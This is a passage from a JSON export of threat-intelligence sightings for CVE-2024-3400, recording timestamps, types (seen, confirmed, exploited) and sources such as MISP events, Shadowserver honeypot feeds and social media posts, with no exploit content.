{"vulnerability": "CVE-2024-3400", "sightings": [{"uuid": "edb164e2-6358-4cb1-8356-b0d84df2e91c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-3400", "type": "confirmed", "source": null, "content": "", "creation_timestamp": "2024-10-22T15:51:25.544381Z"}, {"uuid": "24c44f51-5f55-4117-a62d-b268f9d2f46f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": null, "content": "", "creation_timestamp": "2024-10-22T15:51:31.492574Z"}, {"uuid": "7c05ace8-d995-471d-8fca-e2b2051e222f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-3400", "type": "seen", "source": null, "content": "", "creation_timestamp": "2024-10-22T15:51:36.761844Z"}, {"uuid": "5ca48dc7-6d7f-4024-9d9c-46b3b9a180d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": null, "content": "", "creation_timestamp": "2024-10-23T08:24:34.403475Z"}, {"uuid": "4d37a97c-cac8-4ccb-8114-e27ef083efbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "MISP/dcf911ee-17b3-4902-aa15-4ecabf2e40ce", "content": "", "creation_timestamp": "2024-09-12T10:33:13.000000Z"}, {"uuid": "6eece42c-b7bb-4e96-9c79-e062f001f908", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2024-04-12T15:10:02.000000Z"}, {"uuid": "d595cdd3-aec8-4fc6-976d-6fd2ce56c7ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "MISP/9802116c-3ec3-4a8e-8b39-5c69b08df5ab", "content": "", "creation_timestamp": "2024-04-13T15:34:31.000000Z"}, {"uuid": "578a015d-56fc-4d6a-9407-6152ce8f3317", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "MISP/d7d63b76-30b2-426d-b539-96195ff33907", "content": "", "creation_timestamp": "2024-04-18T10:55:46.000000Z"}, {"uuid": "3686b378-3975-4ba9-8584-660963bb36d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "MISP/42ec6a69-f0c4-430d-b5ee-d199b2efc32a", "content": "", "creation_timestamp": "2024-04-22T13:10:15.000000Z"}, {"uuid": "1b2497f9-35c6-41b8-bb42-1869b17104d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "MISP/591f3235-7ebf-44cf-a316-d90d36580532", "content": "", "creation_timestamp": "2024-12-19T13:09:26.000000Z"}, {"uuid": "35df1efd-4765-48d1-98cb-57af286e71d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/redvello.bsky.social/post/3lgpejmauvc2w", "content": "", "creation_timestamp": "2025-01-27T06:59:50.220182Z"}, {"uuid": "c7040ee5-e862-451d-9154-21a72de304c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:46.000000Z"}, {"uuid": "e7b60d9c-68fd-40f3-87ff-ae98782a6dde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-16)", "content": "", "creation_timestamp": "2024-12-16T00:00:00.000000Z"}, {"uuid": "8613596b-8310-4489-9243-2c4d3d54100f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-19)", "content": "", "creation_timestamp": "2024-12-19T00:00:00.000000Z"}, {"uuid": "e9b51b62-3221-47f7-b43e-d6ec7861a22e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/hacktoria.bsky.social/post/3ljsak3ey5h2s", "content": "", "creation_timestamp": "2025-03-07T14:42:02.057219Z"}, {"uuid": "0e392d56-0a22-495c-a726-793ee2aaee48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-03)", "content": "", "creation_timestamp": "2025-03-03T00:00:00.000000Z"}, {"uuid": "5aab7d16-02ae-4d86-8f83-fb31456fd11a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-10)", "content": "", "creation_timestamp": "2025-02-10T00:00:00.000000Z"}, {"uuid": "2daa5270-436e-49b9-b02a-ffd18e5e404b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-04)", "content": "", "creation_timestamp": "2025-03-04T00:00:00.000000Z"}, {"uuid": "acf3ea72-a859-493a-8ed1-3c51c996feaa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:11:02.000000Z"}, {"uuid": "dfdec4e1-fef8-4602-97b7-e3ec2440d2eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/redteamnews.bsky.social/post/3ll3mgp2sut2p", "content": "", "creation_timestamp": "2025-03-24T01:34:02.656224Z"}, {"uuid": "87c459c0-ef93-4c5f-bcf2-159497afc925", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-12)", "content": "", "creation_timestamp": "2025-02-12T00:00:00.000000Z"}, {"uuid": "414bff38-de93-4088-8167-ecbfa28df959", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-22)", "content": "", "creation_timestamp": "2025-02-22T00:00:00.000000Z"}, {"uuid": "612161d0-eff4-4186-8724-bb7f851342ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-26)", "content": "", "creation_timestamp": "2025-02-26T00:00:00.000000Z"}, {"uuid": "6e9e8046-b0e1-4f24-9968-481e51ea58be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-19)", "content": "", "creation_timestamp": "2025-02-19T00:00:00.000000Z"}, {"uuid": "3ce6ed56-9708-4d94-ae7a-9d571ce72ec0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-07)", "content": "", "creation_timestamp": "2025-03-07T00:00:00.000000Z"}, {"uuid": "da64e1d7-1b02-49e7-9086-513be7266dcf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-17)", "content": "", "creation_timestamp": "2025-02-17T00:00:00.000000Z"}, {"uuid": "1b3e210c-7073-4ecf-b5ad-1e530d08c197", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://infosec.exchange/users/saltmyhash/statuses/114039171548967342", "content": "", "creation_timestamp": "2025-02-21T01:01:38.743377Z"}, {"uuid": "5ac867fa-0afe-4547-8670-c2a291d727b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-17)", "content": "", "creation_timestamp": "2025-02-17T00:00:00.000000Z"}, {"uuid": "be9b0ab2-98c2-4f03-9384-e0d2754849ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "MISP/dcf911ee-17b3-4902-aa15-4ecabf2e40ce", "content": "", "creation_timestamp": "2025-06-19T23:26:58.000000Z"}, {"uuid": "04bef7ef-a33d-4372-b93d-43f3b6d2669a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:53.000000Z"}, {"uuid": "77f6b094-61fb-437e-90dd-ee1f964b0227", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/andranglin.bsky.social/post/3llqs5kyjc223", "content": "", "creation_timestamp": "2025-04-01T11:42:17.076271Z"}, {"uuid": "c3bf2e13-3234-4ee4-af2b-e611a0534021", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-24)", "content": "", "creation_timestamp": "2025-04-24T00:00:00.000000Z"}, {"uuid": "1ee44074-1687-4a58-aa08-8bc403e40db6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-24)", "content": "", "creation_timestamp": "2025-04-24T00:00:00.000000Z"}, {"uuid": "bf71674c-f276-4805-8836-6516d68bcb22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-e1523a5c-9dce464b104523e0", "content": "", "creation_timestamp": "2025-06-26T08:53:35.081077Z"}, {"uuid": "72e31790-29c0-4b87-b225-46a75165d35c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-25)", "content": "", "creation_timestamp": "2025-04-25T00:00:00.000000Z"}, {"uuid": "9e1d5d3c-d6e3-489e-acc3-8477d079b095", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-26)", "content": "", "creation_timestamp": "2025-04-26T00:00:00.000000Z"}, {"uuid": "27c705ef-be8b-4d06-89c4-49aa6ec68679", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-26)", "content": "", "creation_timestamp": "2025-04-26T00:00:00.000000Z"}, {"uuid": "621ef460-1cf7-4497-903b-4bb9da57d048", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-27)", "content": "", "creation_timestamp": "2025-04-27T00:00:00.000000Z"}, {"uuid": "6710972a-47d7-4eaa-8d03-d35242e7ed9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-01)", "content": "", "creation_timestamp": "2025-05-01T00:00:00.000000Z"}, {"uuid": "aa327323-4d49-44aa-a1f6-149b4380af23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-06)", "content": "", "creation_timestamp": "2025-05-06T00:00:00.000000Z"}, {"uuid": "c5bdfffc-780b-4a15-a7b9-4d60929f67ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-01)", "content": "", "creation_timestamp": "2025-05-01T00:00:00.000000Z"}, {"uuid": "25a9dcd7-c173-42af-a7f0-ff2844d85d1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-03)", "content": "", "creation_timestamp": "2025-05-03T00:00:00.000000Z"}, {"uuid": "e3fa1dac-b620-49a3-9d99-9e510ce6a05d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-04)", "content": "", "creation_timestamp": "2025-11-04T00:00:00.000000Z"}, {"uuid": "adbc3398-415b-4e67-885b-e5449bf6269d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-06)", "content": "", "creation_timestamp": "2025-05-06T00:00:00.000000Z"}, {"uuid": "1d05d573-9e34-4822-b830-b1de0046041c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/ytroncal.bsky.social/post/3lu7lbziyus2w", "content": "", "creation_timestamp": "2025-07-18T04:10:59.104305Z"}, {"uuid": "ef8353ec-18d6-4da1-86a4-9bed9fe85bce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-10-01)", "content": "", "creation_timestamp": "2025-10-01T00:00:00.000000Z"}, {"uuid": "c3171710-0395-4dea-81ef-7d102ff536f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-18)", "content": "", "creation_timestamp": "2025-10-18T00:00:00.000000Z"}, {"uuid": "92c4b6ec-51a6-4fed-8846-696994d5c075", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-12)", "content": "", "creation_timestamp": "2025-09-12T00:00:00.000000Z"}, {"uuid": "454b93ba-06cf-4a19-9f2e-5d2b3e3fd82f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-05)", "content": "", "creation_timestamp": "2025-09-05T00:00:00.000000Z"}, {"uuid": "d3d5b937-cda8-4fc1-b2f7-fb5e767e0d9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-01)", "content": "", "creation_timestamp": "2025-10-01T00:00:00.000000Z"}, {"uuid": "880f6938-815e-4cda-a0b6-7dab5ab03eef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-21)", "content": "", "creation_timestamp": "2025-10-21T00:00:00.000000Z"}, {"uuid": "9832b703-e23e-461c-9992-34b9862d4da6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-27)", "content": "", "creation_timestamp": "2025-10-27T00:00:00.000000Z"}, {"uuid": "06cb44fc-9751-4e10-bd7d-10607dc1a569", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-13)", "content": "", "creation_timestamp": "2025-10-13T00:00:00.000000Z"}, {"uuid": "02c56088-e269-45bc-807a-9f21fe4adff0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:03.000000Z"}, {"uuid": "41fce624-b5ec-405c-a717-c7a1caf50e36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-06)", "content": "", "creation_timestamp": "2025-10-06T00:00:00.000000Z"}, {"uuid": "504ae394-e0ce-48a3-9668-5d3f439d2125", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://bsky.app/profile/cyberalerts.bsky.social/post/3lv7i6a5m5q2o", "content": "", "creation_timestamp": "2025-07-30T20:40:18.931137Z"}, {"uuid": "97d1ceda-8e7e-4750-8e7e-5244350511ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-29)", "content": "", "creation_timestamp": "2025-10-29T00:00:00.000000Z"}, {"uuid": "3b8e308c-0251-4516-a142-4eaabfc38666", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-17)", "content": "", "creation_timestamp": "2025-11-17T00:00:00.000000Z"}, {"uuid": "e3107dcd-1bd5-441d-8efa-a3c73db0d8b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-15)", "content": "", "creation_timestamp": "2025-11-15T00:00:00.000000Z"}, {"uuid": "17c12c9b-547b-4aaf-adf4-fc8877331796", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-09)", "content": "", "creation_timestamp": "2025-09-09T00:00:00.000000Z"}, {"uuid": "271d0777-90f0-4393-9091-d89c404ca7c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-15)", "content": "", "creation_timestamp": "2025-10-15T00:00:00.000000Z"}, {"uuid": "d1a7dad6-666d-4835-ba44-6ff737d26bf3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-10-02)", "content": "", "creation_timestamp": "2025-10-02T00:00:00.000000Z"}, {"uuid": "b624c55f-b6c1-420d-b335-cef576922136", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://www.cert.at/de/warnungen/2024/4/palo-alto-cve-2024-3400", "content": "", "creation_timestamp": "2024-04-12T07:56:06.000000Z"}, {"uuid": "f5dc9a07-d189-4ce3-ac97-aa2edd0017a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-02)", "content": "", "creation_timestamp": "2025-10-02T00:00:00.000000Z"}, {"uuid": "cc0e086e-f025-4fe2-8dee-4d7e4118c077", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-11-20)", "content": "", "creation_timestamp": "2025-11-20T00:00:00.000000Z"}, {"uuid": "ad69a1f9-5f05-4d97-82ac-12f818ebe2ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-31)", "content": "", "creation_timestamp": "2025-10-31T00:00:00.000000Z"}, {"uuid": "4fcad689-e7a4-43ba-8894-792e71c8d589", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-06)", "content": "", "creation_timestamp": "2025-09-06T00:00:00.000000Z"}, {"uuid": "88a8f1a7-e5c9-4615-8677-f6d4cc877930", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-13)", "content": "", "creation_timestamp": "2025-09-13T00:00:00.000000Z"}, {"uuid": "4219aa3c-11e0-42e5-a866-04268f7a2e76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-19)", "content": "", "creation_timestamp": "2025-10-19T00:00:00.000000Z"}, {"uuid": "b0b116c6-39ce-4d65-b905-0241ff061dcb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-07)", "content": "", "creation_timestamp": "2025-08-07T00:00:00.000000Z"}, {"uuid": "2ac56b20-bf71-43ae-9c88-a493fd0754a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-10)", "content": "", "creation_timestamp": "2025-08-10T00:00:00.000000Z"}, {"uuid": "2396e7a0-9760-4943-bd92-538f4eaa9301", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-20)", "content": "", "creation_timestamp": "2025-11-20T00:00:00.000000Z"}, {"uuid": "1e7f7104-ead9-4354-ad8e-a9f5e645247e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-08)", "content": "", "creation_timestamp": "2025-08-08T00:00:00.000000Z"}, {"uuid": "1826122b-469c-4d38-824a-5c78041616f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-08)", "content": "", "creation_timestamp": "2025-10-08T00:00:00.000000Z"}, {"uuid": "570607d4-8165-41e3-9499-7a79561c480c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", 